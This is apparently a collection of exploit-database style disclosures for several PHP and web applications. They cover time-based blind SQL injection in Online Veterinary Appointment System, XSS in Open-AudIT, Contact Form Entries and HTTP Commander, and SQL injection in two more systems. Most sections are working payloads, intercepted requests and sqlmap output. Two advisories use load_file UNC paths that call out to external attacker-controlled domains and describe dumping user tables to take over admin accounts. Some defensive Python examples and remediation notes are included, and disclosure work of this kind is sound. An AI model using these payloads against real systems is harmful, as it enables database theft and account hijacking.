<pre><code># Exploit Title: Online Veterinary Appointment System 1.0 - 'Multiple' SQL Injection<br /># Date: 05/01/2022<br /># Exploit Author: twseptian<br /># Vendor Homepage: https://www.sourcecodester.com/php/15119/online-veterinary-appointment-system-using-phpoop-free-source-code.html<br /># Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/ovas.zip<br /># Version: v1.0<br /># Tested on: Kali Linux 2021.4<br /><br />=====================================================================================================================================<br />SQL Injection:<br />=====================================================================================================================================<br />SQL injection is a web security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. Online Veterinary Appointment System 1.0 is vulnerable to multiple SQL injections: six admin-side endpoints place the 'id' parameter (and, on the My Account form, also firstname, lastname and username) directly into SQL queries. All six injection points are reached from the admin dashboard, and the captured requests below carry an admin session cookie.<br /><br />=====================================================================================================================================<br />Attack Vector:<br />=====================================================================================================================================<br />An attacker can compromise the application's database with automated or manual tools such as sqlmap. Each injection below is confirmed with a time-based blind payload: the response takes about 5 seconds longer only when the injected SLEEP(5) is executed by the database, and that delay is the signal checked in each Step-3.<br /><br />=====================================================================================================================================<br />1. 
Appointment Requests - Vulnerable Parameter(s): id<br />=====================================================================================================================================<br />Steps to reproduce:<br />Step-1: On the dashboard navigate to the 'Appointment Requests' page using the following URL:<br /><br />http://localhost/ovas/admin/?page=appointments<br /><br />then go to 'Action' > 'View'.<br /><br />Step-2: Put the SQL injection payload in the 'id' parameter of the request that the 'View' action sends.<br />time-based blind payload : page=appointments/view_details&id=1' AND (SELECT 2197 FROM (SELECT(SLEEP(5)))DZwi) AND 'mQQq'='mQQq<br /><br />Step-3: The target accepts the payload and the response is delayed by 5 seconds.<br /><br />=====================================================================================================================================<br />2. Inquiries - Vulnerable Parameter(s): id<br />=====================================================================================================================================<br />Steps to reproduce:<br />Step-1: On the dashboard navigate to the 'Inquiries' page using the following URL:<br /><br />http://localhost/ovas/admin/?page=inquiries<br /><br />then go to 'Action' > 'View'.<br /><br />Step-2: Intercept the 'View' request with Burp Suite: <br /><br />GET /ovas/admin/inquiries/view_details.php?id=1 HTTP/1.1<br />Host: localhost<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0<br />Accept: */*<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />X-Requested-With: XMLHttpRequest<br />Connection: close<br />Referer: http://localhost/ovas/admin/?page=inquiries<br />Cookie: columns%2Fsuperschool%2Fcourses_view.php={%22courses-name%22:true}; columns%2Fsuperschool%2Fstudents_view.php={%22students-regno%22:true%2C%22students-name%22:true%2C%22students-course%22:true%2C%22students-year%22:true%2C%22students-academicyear%22:true}; 
columns%2Fsuperschool%2Fattendance_view.php={%22attendance-student%22:true%2C%22attendance-regno%22:true%2C%22attendance-week%22:true%2C%22attendance-date%22:true%2C%22attendance-unit%22:true%2C%22attendance-attended%22:true%2C%22attendance-semester%22:true%2C%22attendance-academicyear%22:true}; columns%2Fsuperschool%2Funits_view.php={%22units-name%22:true}; Student_Management_System=od4k9dre71c7assr0bldij1r1l; PHPSESSID=ml909jot3g3pr65oh31l8ip6j9<br />Sec-Fetch-Dest: empty<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Site: same-origin<br /><br />Put the SQL injection payload in the 'id' parameter.<br />time-based blind payload : /ovas/admin/inquiries/view_details.php?id=1' AND (SELECT 6051 FROM (SELECT(SLEEP(5)))DEds) AND 'SOxP'='SOxP<br /><br />Step-3: The target accepts the payload and the response is delayed by 5 seconds.<br /><br />=====================================================================================================================================<br />3. My Account - Vulnerable Parameter(s): id,firstname,lastname,username<br />=====================================================================================================================================<br />Steps to reproduce:<br />Step-1: On the dashboard navigate to the 'My Account' page using the following URL:<br /><br />http://localhost/ovas/admin/?page=user<br /><br />Step-2: Intercept the 'Update' request with Burp Suite: <br /><br />POST /ovas/classes/Users.php?f=save HTTP/1.1<br />Host: localhost<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0<br />Accept: */*<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />X-Requested-With: XMLHttpRequest<br />Content-Type: multipart/form-data; boundary=---------------------------24959341351495697487735843118<br />Content-Length: 796<br />Origin: http://localhost<br />Connection: close<br />Referer: http://localhost/ovas/admin/?page=user<br />Cookie: 
columns%2Fsuperschool%2Fcourses_view.php={%22courses-name%22:true}; columns%2Fsuperschool%2Fstudents_view.php={%22students-regno%22:true%2C%22students-name%22:true%2C%22students-course%22:true%2C%22students-year%22:true%2C%22students-academicyear%22:true}; columns%2Fsuperschool%2Fattendance_view.php={%22attendance-student%22:true%2C%22attendance-regno%22:true%2C%22attendance-week%22:true%2C%22attendance-date%22:true%2C%22attendance-unit%22:true%2C%22attendance-attended%22:true%2C%22attendance-semester%22:true%2C%22attendance-academicyear%22:true}; columns%2Fsuperschool%2Funits_view.php={%22units-name%22:true}; Student_Management_System=od4k9dre71c7assr0bldij1r1l; PHPSESSID=ml909jot3g3pr65oh31l8ip6j9<br />Sec-Fetch-Dest: empty<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Site: same-origin<br /><br />-----------------------------24959341351495697487735843118<br />Content-Disposition: form-data; name="id"<br /><br />4<br />-----------------------------24959341351495697487735843118<br />Content-Disposition: form-data; name="firstname"<br /><br />user<br />-----------------------------24959341351495697487735843118<br />Content-Disposition: form-data; name="lastname"<br /><br />user<br />-----------------------------24959341351495697487735843118<br />Content-Disposition: form-data; name="username"<br /><br />user<br />-----------------------------24959341351495697487735843118<br />Content-Disposition: form-data; name="password"<br /><br /><br />-----------------------------24959341351495697487735843118<br />Content-Disposition: form-data; name="img"; filename=""<br />Content-Type: application/octet-stream<br /><br /><br />-----------------------------24959341351495697487735843118--<br /><br />Put the SQL injection payload in any of the vulnerable parameters (id, firstname, lastname, username). For example, the time-based blind payload in 'id' (a numeric context, so no quote is needed to break out of a string literal): <br /><br />[SNIP]<br />Content-Disposition: form-data; name="id"<br /><br />4 AND (SELECT 9713 FROM (SELECT(SLEEP(5)))YIam)<br 
/>-----------------------------24959341351495697487735843118<br />Content-Disposition: form-data; name="firstname"<br /><br />user<br />-----------------------------24959341351495697487735843118<br />Content-Disposition: form-data; name="lastname"<br /><br />user<br />-----------------------------24959341351495697487735843118<br />Content-Disposition: form-data; name="username"<br /><br />user<br />-----------------------------24959341351495697487735843118<br />Content-Disposition: form-data; name="password"<br /><br /><br />-----------------------------24959341351495697487735843118<br />Content-Disposition: form-data; name="img"; filename=""<br />Content-Type: application/octet-stream<br /><br /><br />-----------------------------24959341351495697487735843118--<br /><br />Step-3: Send the request (in Burp Repeater, click 'Send'). The target accepts the payload and the response is delayed by 5 seconds. The firstname, lastname and username parameters behave the same way.<br /><br />=====================================================================================================================================<br />4. 
Category List - Vulnerable Parameter(s): id<br />=====================================================================================================================================<br />Steps to reproduce:<br />Step-1: On the dashboard navigate to the 'Category List' page using the following URL:<br /><br />http://localhost/ovas/admin/?page=categories<br /><br />then go to 'Action' > 'Edit' <br /><br />Step-2: Intercept the 'Edit' request with Burp Suite: <br /><br />GET /ovas/admin/categories/manage_category.php?id=2 HTTP/1.1<br />Host: localhost<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0<br />Accept: */*<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />X-Requested-With: XMLHttpRequest<br />Connection: close<br />Referer: http://localhost/ovas/admin/?page=categories<br />Cookie: columns%2Fsuperschool%2Fcourses_view.php={%22courses-name%22:true}; columns%2Fsuperschool%2Fstudents_view.php={%22students-regno%22:true%2C%22students-name%22:true%2C%22students-course%22:true%2C%22students-year%22:true%2C%22students-academicyear%22:true}; columns%2Fsuperschool%2Fattendance_view.php={%22attendance-student%22:true%2C%22attendance-regno%22:true%2C%22attendance-week%22:true%2C%22attendance-date%22:true%2C%22attendance-unit%22:true%2C%22attendance-attended%22:true%2C%22attendance-semester%22:true%2C%22attendance-academicyear%22:true}; columns%2Fsuperschool%2Funits_view.php={%22units-name%22:true}; Student_Management_System=od4k9dre71c7assr0bldij1r1l; PHPSESSID=ml909jot3g3pr65oh31l8ip6j9<br />Sec-Fetch-Dest: empty<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Site: same-origin<br /><br />Put the SQL injection payload in the 'id' parameter.<br />time-based blind payload : /ovas/admin/categories/manage_category.php?id=2' AND (SELECT 3851 FROM (SELECT(SLEEP(5)))UFXk) AND 'XbFb'='XbFb<br /><br />Step-3: The target accepts the payload and the response is delayed by 5 seconds.<br /><br 
/>=====================================================================================================================================<br />5. Service List - Vulnerable Parameter(s): id<br />=====================================================================================================================================<br />Steps to reproduce:<br />Step-1: On the dashboard navigate to the 'Service List' page using the following URL:<br /><br />http://localhost/ovas/admin/?page=services<br /><br />then go to 'Action' > 'View' <br /><br />Step-2: Intercept the 'View' request with Burp Suite: <br /><br />GET /ovas/admin/services/view_service.php?id=4 HTTP/1.1<br />Host: localhost<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0<br />Accept: */*<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />X-Requested-With: XMLHttpRequest<br />Connection: close<br />Referer: http://localhost/ovas/admin/?page=services<br />Cookie: columns%2Fsuperschool%2Fcourses_view.php={%22courses-name%22:true}; columns%2Fsuperschool%2Fstudents_view.php={%22students-regno%22:true%2C%22students-name%22:true%2C%22students-course%22:true%2C%22students-year%22:true%2C%22students-academicyear%22:true}; columns%2Fsuperschool%2Fattendance_view.php={%22attendance-student%22:true%2C%22attendance-regno%22:true%2C%22attendance-week%22:true%2C%22attendance-date%22:true%2C%22attendance-unit%22:true%2C%22attendance-attended%22:true%2C%22attendance-semester%22:true%2C%22attendance-academicyear%22:true}; columns%2Fsuperschool%2Funits_view.php={%22units-name%22:true}; Student_Management_System=od4k9dre71c7assr0bldij1r1l; PHPSESSID=ml909jot3g3pr65oh31l8ip6j9<br />Sec-Fetch-Dest: empty<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Site: same-origin<br /><br />Put the SQL injection payload in the 'id' parameter.<br />time-based blind payload : /ovas/admin/services/view_service.php?id=4' AND (SELECT 5507 FROM (SELECT(SLEEP(5)))kAsY) AND 'UrUQ'='UrUQ<br /><br 
/>Step-3: The target accepts the payload and the response is delayed by 5 seconds.<br /><br />=====================================================================================================================================<br />6. Admin User List - Vulnerable Parameter(s): id<br />=====================================================================================================================================<br />Steps to reproduce:<br />Step-1: On the dashboard navigate to the 'Admin User List' page using the following URL:<br /><br />http://localhost/ovas/admin/?page=user/list<br /><br />then go to 'Action' > 'Edit' <br /><br />Step-2: Intercept the 'Edit' request with Burp Suite: <br /><br />GET /ovas/admin/?page=user/manage_user&id=3 HTTP/1.1<br />Host: localhost<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Connection: close<br />Referer: http://localhost/ovas/admin/?page=user/list<br />Cookie: columns%2Fsuperschool%2Fcourses_view.php={%22courses-name%22:true}; columns%2Fsuperschool%2Fstudents_view.php={%22students-regno%22:true%2C%22students-name%22:true%2C%22students-course%22:true%2C%22students-year%22:true%2C%22students-academicyear%22:true}; columns%2Fsuperschool%2Fattendance_view.php={%22attendance-student%22:true%2C%22attendance-regno%22:true%2C%22attendance-week%22:true%2C%22attendance-date%22:true%2C%22attendance-unit%22:true%2C%22attendance-attended%22:true%2C%22attendance-semester%22:true%2C%22attendance-academicyear%22:true}; columns%2Fsuperschool%2Funits_view.php={%22units-name%22:true}; Student_Management_System=od4k9dre71c7assr0bldij1r1l; PHPSESSID=ml909jot3g3pr65oh31l8ip6j9<br />Upgrade-Insecure-Requests: 1<br />Sec-Fetch-Dest: document<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-User: 
?1<br /><br />Put the SQL injection payload in the 'id' parameter of the intercepted manage_user request.<br />time-based blind payload : /ovas/admin/?page=user/manage_user&id=3' AND (SELECT 5507 FROM (SELECT(SLEEP(5)))kAsY) AND 'UrUQ'='UrUQ<br /><br />Step-3: The target accepts the payload and the response is delayed by 5 seconds.<br /></code></pre>
<pre><code># Exploit Title: Open-AudIT Community 4.2.0 - Cross-Site Scripting (XSS) (Authenticated)<br /># Date: 01/11/2021<br /># Exploit Author: Dominic Clark (parzival)<br /># Vendor Homepage: https://opmantek.com/<br /># Software Link: https://www.open-audit.org/downloads.php<br /># Category: WebApps<br /># Version: <= 4.2.0<br /># Tested on: Windows 10<br /># CVE: CVE-2021-44916<br /><br /># 1. Vendor Description<br /># Open-AudIT is an application to tell you exactly what is on your network, how it is configured and when it changes.<br /># Essentially, Open-AudIT is a database of information that can be queried via a web interface.<br /># Open-AudIT will run on both Windows and Linux systems. <br /><br /># 2. Technical Description<br /># The vendor describes the bug as an issue with link creation in the GUI: on pages that offer a file import, the request URL is written into an HTML attribute of a generated link without encoding.<br /># A double quote in the URL path therefore closes that attribute, and everything after it (in the PoC an onmouseover handler plus a style that stretches the element over the whole viewport) is parsed by the browser as further attributes.<br /># The JavaScript runs as soon as the victim moves the pointer. The victim must be logged in to Open-AudIT Community for the page to render.<br /><br /># 3. Proof of Concept<br /># Step 1: Log in to Open-AudIT via the login page (default credentials are admin/password)<br /># Step 2: Open one of the following PoC URLs. The issue was observed on every page that offers a file import (e.g., http://localhost/open-audit/index.php/attributes/import):<br /><br />Vulnerable URL 1: "http://localhost/open-audit/index.php/discoveries/import%22onmouseover%3d%22alert(1)%22style%3d%22position%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b%22"<br />Vulnerable URL 2: "http://localhost/open-audit/index.php/credentials/import%22onmouseover%3d%22alert(1)%22style%3d%22position%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b%22"<br /><br /># Step 3: Observe that the payload executes and a popup is displayed. 
<br /># Chained with social engineering (an authenticated user is persuaded to open the link), this vulnerability can be used to obtain sensitive information such as the user's session cookie.<br /><br /># 4. Remediation<br /># Apply the workarounds and mitigations provided by Opmantek.<br /># https://community.opmantek.com/display/OA/Errata+-+4.2.0+and+earlier+Javascript+vulnerability<br /><br /></code></pre>
<pre><code># Exploit Title: Contact Form Entries < 1.2.4 - Reflected Cross-Site Scripting (XSS) <br /># Date: 22/12/2021<br /># Exploit Author: gx1 <gaetano.perrone[at]secsi.io><br /># Vulnerability Discovery: Gaetano Perrone (aka gx1)<br /># Vendor Homepage: https://www.crmperks.com/<br /># Software Link: https://wordpress.org/plugins/contact-form-entries/<br /># Version: < 1.2.4<br /># Tested on: any<br /># CVE : CVE-2021-25079<br /><br /><br /><br /># References: <br />* https://wpscan.com/vulnerability/c3d49271-9656-4428-8357-0d1d77b7fc63<br />* https://secsi.io/blog/cve-2021-25079-multiple-reflected-xss-in-contact-form-entries-plugin/<br /><br /># Description: <br />Several parameters of the vxcf_leads administrator page (form_id, status, order, orderby and search) are reflected into the page without output encoding and are therefore vulnerable to reflected cross-site scripting. The page lives under wp-admin, so the victim has to be a logged-in user who can reach the plugin's entries page; the attacker only needs that user to open a crafted link.<br /><br /><br /><br /><br /><br /># Proof Of Concept: <br /><br />The following request:<br />---------------------------------------------------------------------------------------------------------------------------------------<br /><br />GET /wp-admin/admin.php?page=vxcf_leads&form_id=cf_5&status&tab=entries&search&order=desc&orderby=fir+<br /><br />---------------------------------------------------------------------------------------------------------------------------------------<br /><br />returns the list of entries saved in the database.<br />The form_id value is reflected into an <input> tag. 
<br />The form_id parameter is not encoded for the HTML attribute context, so arbitrary attribute text can be injected.<br /><br />The following request:<br /><br />---------------------------------------------------------------------------------------------------------------------------------------<br />http://example.com/wp-admin/admin.php?page=vxcf_leads&form_id=cf_5e1kpc%22+onmouseover%3Dalert%281%29+ne97l&status&tab=entries&search&order=desc&orderby=fir+ <br />---------------------------------------------------------------------------------------------------------------------------------------<br /><br />closes the name attribute with the double quote and leaves onmouseover behind as a separate attribute of the input element: <br />----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------<br /><input class="hide-column-tog" name="cf_5e1kpc\" onmouseover=alert(1) ne97l-vxvx-vxurl-hide" type="checkbox" id="cf_5e1kpc\" onmouseover=alert(1) ne97l-vxvx-vxurl-hide" value="cf_5e1kpc\" onmouseover=alert(1) ne97l-vxvx-vxurl" checked='checked' />Source</label><label><br />----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------<br /><br /><br />Note the backslash the plugin puts in front of the injected quote: backslash escaping (addslashes-style) protects SQL or JavaScript string literals, but an HTML parser gives the backslash no meaning and still ends the attribute at the quote. Moving the mouse over the element triggers the handler. The need for that interaction can be removed by also injecting a style attribute that stretches the input to the full width and height of the viewport, so the handler fires as soon as the victim moves the pointer after opening the link. 
<br /><br />The status parameter is the most dangerous of the set. Its payload closes an HTML comment with --> and appends a script tag, so the value is reflected inside a comment and the script executes with no user interaction as soon as the victim opens the following URL: <br />-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------<br />http://example.com/wp-admin/admin.php?page=vxcf_leads&form_id=cf_5&status=b9zrb--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Eg482f&tab=entries&search&order=asc&orderby=file-438&field&time&start_date&end_date <br />-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------<br /><br />The order, orderby and search parameters are vulnerable in the same attribute context as form_id:<br />-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------<br />http://example.com/wp-admin/admin.php?page=vxcf_leads&form_id=cf_5&status&tab=entries&search&order=desc&orderby=fir%20ihj17%22accesskey%3d%22x%22onclick%3d%22alert(1)%22%2f%2fv9tdt<br /><br />-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------<br /><br /><br /><br /># Solution: <br />Upgrade Contact Form Entries to version 1.2.4 or later.<br /></code></pre>
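The attribute-context problem behind both the Contact Form Entries and the Open-AudIT proofs of concept, as an added example in Python (not the plugin's, WordPress's or Open-AudIT's code): the same form_id value is rendered through a backslash-escaping routine and through HTML entity escaping, and both results are fed to Python's html.parser, which, like a browser, only finds the injected onmouseover attribute in the first case. The checkbox markup is a constructed stand-in for the plugin's column-toggle element; addslashes and esc_attr are the two strategies being compared, named after their PHP/WordPress counterparts, not functions taken from the plugin.

```python
"""Why backslash-escaping does not stop attribute-context XSS."""
import html
from html.parser import HTMLParser
from typing import Callable, Dict, List

# The form_id value from the proof of concept above, URL-decoded.
PAYLOAD = 'cf_5e1kpc" onmouseover=alert(1) ne97l'


def addslashes(value: str) -> str:
    """Behaves like PHP addslashes(): fine for SQL or JS string literals,
    useless in HTML. Produces the backslash seen in the reflected markup."""
    return value.replace("\\", "\\\\").replace('"', '\\"').replace("'", "\\'")


def esc_attr(value: str) -> str:
    """Entity-escape for an HTML attribute (what WordPress esc_attr() does)."""
    return html.escape(value, quote=True)


def render_checkbox(form_id: str, escape: Callable[[str], str]) -> str:
    """Constructed stand-in for the plugin's column-toggle checkbox."""
    name = escape(form_id + "-vxvx-vxurl-hide")
    return f'<input class="hide-column-tog" name="{name}" type="checkbox" />'


class InputAttributes(HTMLParser):
    """Record the attributes of every <input> the way a browser sees them."""

    def __init__(self) -> None:
        super().__init__()
        self.inputs: List[Dict[str, str]] = []

    def handle_starttag(self, tag, attrs) -> None:
        if tag == "input":
            self.inputs.append({name: (value or "") for name, value in attrs})


def parsed_attributes(markup: str) -> Dict[str, str]:
    parser = InputAttributes()
    parser.feed(markup)
    parser.close()
    return parser.inputs[0] if parser.inputs else {}


def event_handlers(markup: str) -> List[str]:
    """Names of on* attributes that ended up on the input element."""
    return sorted(k for k in parsed_attributes(markup) if k.startswith("on"))


if __name__ == "__main__":
    for label, fn in (("addslashes", addslashes), ("esc_attr", esc_attr)):
        out = render_checkbox(PAYLOAD, fn)
        print(f"{label:10} handlers={event_handlers(out)}\n           {out}")
```

With addslashes the parser reports an onmouseover attribute; with esc_attr the whole injected string stays inside the name attribute's value, which is the behaviour the 1.2.4 fix has to achieve for every reflected parameter.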
<pre><code># Exploit Title: HTTP Commander 3.1.9 - Stored Cross Site Scripting (XSS)<br /># Date: 07/01/2022<br /># Exploit Author: Oscar Sandén<br /># Vendor Homepage: https://www.element-it.com<br /># Software Link: https://www.element-it.com/downloads.aspx<br /># Version: 3.1.9<br /># Tested on: Windows Server 2016<br /><br />[Description]<br />There is a stored XSS in the 'Zip content' feature of the HTTP Commander application. The vulnerable field is the filename of the files inside the zip: the archive listing renders entry names without HTML encoding, so any user who views the contents of an uploaded archive executes whatever markup the entry names contain. This vulnerability exists in the 3.x branch of HTTP Commander.<br /><br />[Steps to reproduce]<br />1) Create a file with an XSS payload in its name. Examples:<br /><img src=x onerror=alert(1)>.txt<br /><img src=x onerror="document.location='https:'+String.fromCharCode(47)+String.fromCharCode(47)+'exploit-db.com'">.txt<br />Or any other JavaScript you like.<br />2) Zip the files<br />3) Upload the ZIP file<br />4) In HTTP Commander, right-click the file and select 'Zip content'.<br />5) If the files are in a subfolder, expand it until the filenames are shown.<br /><br />[Exploit]<br />mkdir -p payload<br />touch 'payload/<img src=x onerror=alert(1)>.txt'<br />zip -r test.zip payload<br /> <br /></code></pre>
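Building the proof-of-concept archive and screening it before display, as an added example in Python (not HTTP Commander's code and not the advisory author's). zipfile stores the entry name byte-for-byte, which sidesteps the shell quoting needed for '<' and '>' in the touch/zip commands, and the second half is the check a file manager should perform on the same archive: treat entry names as untrusted text, flag the ones carrying HTML metacharacters, and entity-escape every name before it reaches the listing. The entry names are constructed here; the archive is built in memory and only written to test.zip by the __main__ block.

```python
"""Build the proof-of-concept archive and screen entry names before display."""
import html
import io
import re
import zipfile
from typing import List

# Constructed entry names: the advisory's payload file plus a harmless one.
POC_NAMES = [
    "payload/<img src=x onerror=alert(1)>.txt",
    "payload/notes.txt",
]
HTML_METACHARS = re.compile(r"""[<>"'&]""")


def build_poc_zip(names: List[str]) -> bytes:
    """Create the archive in memory. The file body is irrelevant; the entry
    name is the payload, and zipfile writes it exactly as given."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name in names:
            zf.writestr(name, b"x")
    return buf.getvalue()


def suspicious_entries(zip_bytes: bytes) -> List[str]:
    """Entry names containing HTML metacharacters: worth logging or rejecting
    at upload time, and always worth escaping at render time."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        return [n for n in zf.namelist() if HTML_METACHARS.search(n)]


def listing_html(zip_bytes: bytes) -> str:
    """Render the archive listing the safe way: every name is treated as
    untrusted text and entity-escaped before it touches the markup."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        items = "".join(f"<li>{html.escape(n, quote=True)}</li>" for n in zf.namelist())
    return f"<ul>{items}</ul>"


if __name__ == "__main__":
    data = build_poc_zip(POC_NAMES)
    with open("test.zip", "wb") as fh:  # the archive to upload in step 3
        fh.write(data)
    print("flagged:", suspicious_entries(data))
    print(listing_html(data))
```

Rejecting archives at upload time is optional and easy to bypass (names can be changed to other vectors); the escaping in listing_html is the part that actually closes the hole.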
<pre><code>## Title: Online Examination System Project 1.0 - SQL Injection<br />## Author: nu11secur1ty<br />## Date: 01.10.2022<br />## Vendor: https://projectworlds.in/free-projects/php-projects/<br />## Software: https://projectworlds.in/free-projects/php-projects/online-examination/<br /><br />## Description:<br />The eid parameter in `account.php` from Online Examination System 1.0 appears to be vulnerable to SQL injection.<br />The payload '+(select<br />load_file('\\\\0jkmt3q30zv5dtuzpbb7tew1fsll9dz1q4ev1npc.tupaka.net\\xxi'))+'<br />was submitted in the eid parameter.<br />This payload injects a SQL sub-query that calls MySQL's load_file<br />function with a UNC path that points at an external, attacker-controlled<br />domain.<br />The server interacted with that domain, which proves that the<br />injected SQL query was executed even though the HTTP response itself<br />shows nothing (an out-of-band check; it relies on MySQL running on Windows,<br />where UNC paths are resolved, and on the database account holding the<br />FILE privilege).<br />With the injection confirmed, the sqlmap output below shows boolean-based,<br />error-based and time-based techniques all working; from there the user<br />table can be dumped and an attacker takes control of every account,<br />including the administrator account.<br />Status: CRITICAL<br /><br />[+] Payload:<br /><br />```mysql<br />---<br />Parameter: eid (GET)<br /> Type: boolean-based blind<br /> Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)<br /> Payload: q=quiz&step=2&eid=-2303' OR 9254=9254#&n=2&t=2<br /><br /> Type: error-based<br /> Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or<br />GROUP BY clause (FLOOR)<br /> Payload: q=quiz&step=2&eid=558920ff906b8'+(select<br />load_file('\\\\0jkmt3q30zv5dtuzpbb7tew1fsll9dz1q4ev1npc.tupaka.net\\xxi'))+''<br />OR (SELECT 8851 FROM(SELECT COUNT(*),CONCAT(0x71627a7171,(SELECT<br />(ELT(8851=8851,1))),0x7162766271,FLOOR(RAND(0)*2))x FROM<br />INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- enxi&n=2&t=2<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: q=quiz&step=2&eid=558920ff906b8'+(select<br />load_file('\\\\0jkmt3q30zv5dtuzpbb7tew1fsll9dz1q4ev1npc.tupaka.net\\xxi'))+''<br />AND (SELECT 2169 FROM 
(SELECT(SLEEP(3)))vUQa)-- mkFM&n=2&t=2<br />---<br />- admin PWNED:<br /><br />---<br />Parameter: eid (GET)<br /> Type: boolean-based blind<br /> Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)<br /> Payload: q=quiz&step=2&eid=-3444' OR 9185=9185#&n=2&t=2<br /><br /> Type: error-based<br /> Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or<br />GROUP BY clause (FLOOR)<br /> Payload: q=quiz&step=2&eid=558920ff906b8'+(select<br />load_file('\\\\0jkmt3q30zv5dtuzpbb7tew1fsll9dz1q4ev1npc.tupaka.net\\xxi'))+''<br />OR (SELECT 8668 FROM(SELECT COUNT(*),CONCAT(0x716b7a6271,(SELECT<br />(ELT(8668=8668,1))),0x716a6a7871,FLOOR(RAND(0)*2))x FROM<br />INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- STVX&n=2&t=2<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: q=quiz&step=2&eid=558920ff906b8'+(select<br />load_file('\\\\0jkmt3q30zv5dtuzpbb7tew1fsll9dz1q4ev1npc.tupaka.net\\xxi'))+''<br />AND (SELECT 4208 FROM (SELECT(SLEEP(3)))GPoO)-- AvEf&n=2&t=2<br />---<br /><br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/edit/main/vendors/Projectworlds/2022/Online%20Examination%20System)<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/iigqg0)<br /><br /><br />-- <br />System Administrator - Infrastructure Engineer<br />Penetration Testing Engineer<br />Exploit developer at https://packetstormsecurity.com/<br />https://cve.mitre.org/index.html and https://www.exploit-db.com/<br />home page: https://www.nu11secur1ty.com/<br />hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=<br /> nu11secur1ty <http://nu11secur1ty.com/><br /></code></pre>
<pre><code>## Title: Online Resort Management System 1.0 - SQL Injection<br />## Author: nu11secur1ty<br />## Date: 01.09.2022<br />## Vendor: https://www.sourcecodester.com/users/tips23<br />## Software: https://www.sourcecodester.com/php/15126/online-resort-management-system-using-phpoop-free-source-code.html<br /><br />## Description:<br />The id parameter of the view_room page appears to be vulnerable to SQL injection.<br />The payload '+(select<br />load_file('\\\\g5m5022yoztcb375vu5zomhbn2tvhl5c80znqbf.chushkopeks.net\\qru'))+'<br />was submitted in the id parameter.<br />This payload injects a SQL sub-query that calls MySQL's load_file<br />function with a UNC path that points at an external, attacker-controlled<br />domain.<br />The server interacted with that domain, which proves that the<br />injected SQL query was executed even though the HTTP response itself<br />shows nothing (an out-of-band check; it relies on MySQL running on Windows,<br />where UNC paths are resolved, and on the database account holding the<br />FILE privilege).<br />With the injection confirmed, the sqlmap output below shows the time-based<br />technique working; from there the user table can be dumped and an attacker<br />takes control of every account, including the administrator account.<br />Status: CRITICAL<br /><br />[+] Payload:<br /><br />```mysql<br />---<br />Parameter: id (GET)<br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: page=view_room&id=5'+(select<br />load_file('\\\\g5m5022yoztcb375vu5zomhbn2tvhl5c80znqbf.chushkopek.net\\qru'))+''<br />AND (SELECT 7995 FROM (SELECT(SLEEP(3)))MQXi) AND 'RNQM'='RNQM<br />---<br /><br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/blob/main/vendors/oretnom23/2022/Online-Resort-Management-System-1.0)<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/524sxp)<br /></code></pre>
